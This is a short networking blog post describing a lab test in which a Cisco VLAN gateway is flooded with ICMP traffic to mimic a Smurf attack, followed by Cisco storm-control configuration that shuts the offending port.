Storm control against simulated Smurf attack on a Vlan
Cisco L3 switches have a nice InterVLAN routing capability that allows us to segment traffic and route between them. This is often used in a production enviroment. For a small example, we should create a test(smurf) VLAN that will be used for some application developer people. Those people behind theapp development department in and Enterprise should use the VLAN SVI ip address as the default gateway for Internet access and server resources. This is a /24 network created for this purposes only. At the access level certain switch ports are added to the specific VLAN (int fa0/9 switchport access vlan 999).
L3SW#sh running-config interface vlan 999
!
interface Vlan999
description SMURF_SVI
ip address 100.100.99.1 255.255.255.0
end
We should setup an IP address to the client interface , in this case a windows box so that the SVI that we created could be used for the attack.
To simulate a SMURF attack I will use the HPING3 security tool under a virtualized Linux box. To test the flooding of the host in the VLAN called SMURF_SVI, I will let go of a ping and follow the traffic that is being replied.
As wee can see that the Hping3 utility has flooded the DG interface of the SVI with many packets (red undeline).
I could do this even in a worse case scenario to flood the BROADCAST address of the SVI. This could drain many resources on my router so I did not wanted to do this. Now we can see the results that a user sitting behind a PC box is experiencing.
Voila, we have no reply from our DG. The flooded packets sent to the SVI completely denied the service from the VLAN. The router was expected to reply with so many ICMP request that it could not be done. Imagine this on a production VLAN with 1000 users. This could mean serious damage !!!
But there is a security mechanism that can be used, in our case Cisco interface Storm control.
Simple config needed on the access switch.
Switch(config)# interface fa1/1
Switch(config-if)# storm-control broadcast level 50
Switch(config-if)# storm-control action shutdown
As I initiate the smurf attack again, the storm control level will wait for the treshold of 50%. After this the port will be shut down. We can also do other mechanism as trap, or some other packet filter. This can be left at our choice. But for now we can see on the other PC box that the PING traffic is running fine without any damage on the company resources.
Traffic control is important as in inside or outside interfaces in an SP/ENT scenarios. We can now see if proper security features are not implied a simple smurf attack could compromise a complete segment of a network.
Fell free to comment!
No comments:
Post a Comment